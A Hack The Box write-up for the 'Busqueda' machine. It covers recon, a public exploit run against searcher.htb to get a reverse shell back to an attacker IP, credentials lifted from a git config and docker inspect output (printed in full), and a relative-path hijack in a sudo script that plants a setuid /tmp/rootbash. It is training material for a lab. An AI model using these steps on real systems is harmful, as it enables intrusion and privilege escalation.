Busqueda
In this write-up, we will solve a box on hackthebox called Busqueda.
Reconaissance
nmap
as usual we will start by scanning the open ports and running services
We find 22/tcp[SSH], 80/tcp[HTTP].
Going to 80/tcp[HTTP] we find a redirect to 'searcher.htb'
let's add it to /etc/hosts file
Foothold as svc user
if we take a look at the web application we will find in the footer the version of some library
searching for an exploit for this version in the internet we find an exploit
looking at the readme we find a guide on how to use the exploit first we set a listener
you have to download the repository using git clone
make sure to make the exploit script executable and then use this command
./exploit.sh searcher.htb <ATTACKER_IP> <LISTENING_PORT>
and you will get a reverse shell as the user svc
Upgrade the shell
you will find the user flag at
/home/svc/user.txtlooking at the web app directory we find a git repository
if we take a look at the config file we will find 2 thing a new subdomain and credentials
we have credentials cody:jh1usoih2bkjaspwe92
if we try those credentials on ssh it will not work
we have also a subdomain called gitea.searcher.htb let's add it to /etc/hosts
let's browse to the subdomain found
if we go to the gitea web application -> Explore -> Users
we will find that there is 2 users cody and administrator
click on sign in in the top right and let's try the credentials we have found in config file inside .git cody:jh1usoih2bkjaspwe92
and we are in
if we try this password for the user svc
so we can run sudo as the user svc
if we run it
so we can see which docker container processes are running on the machine and we can inspect each one
let's see the running containers
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps *
let's inspect the first one but first we need to know the syntax
we need to spicify the format
let's search in the google engine about docker inspect format we will get in the documentation https://docs.docker.com/engine/reference/commandline/inspect/ this
let's go to the link in the --format Description https://docs.docker.com/config/formatting/
according to chatgpt
'{{json .Mounts}}': this is a Go template expression that extracts the information about mounts from the Docker inspection output and formats it as JSON.
to extract all information about the container we will use '{{json .}}'
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea
for json formatting we will use jq since it's already present in the target machine
if it's not there we can copy the result and paste it in a file in the attacking machine and install jq with the command and sudo apt-get -y install jq then use it
if we scroll down we will find gitea db credentials
GITEA__database__USER=gitea
GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh
if we scroll down we will find mysql db credentials
MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF
MYSQL_USER=gitea
MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh
MYSQL_DATABASE=gitealet's try this passwords and login to the gitea app as administrator
the one that make us sign in as administrator is yuiu1hoiu4i5ho1uh
now as administrator let's take a look at the repositories
and let's take a look at the administrator/scripts
and this files are the one in the /opt/scripts directory
so now we can read this files as administrator from the repository
Discovering the system-checkup.py script is not using an absolute path
We now attempt to leverage the relative reference to full-checkup.sh by executing the system-checkup script from another writable directory that will contain our own malicious full-checkup.sh script.
we have to options where we can write our malicious script, /tmp directory or /dev/shm directory
nano full-checkup.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
/tmp/rootbash -p
hope you found this walkthrough easy to understand and follow
Greeting From Sayonara
Last updated
Was this helpful?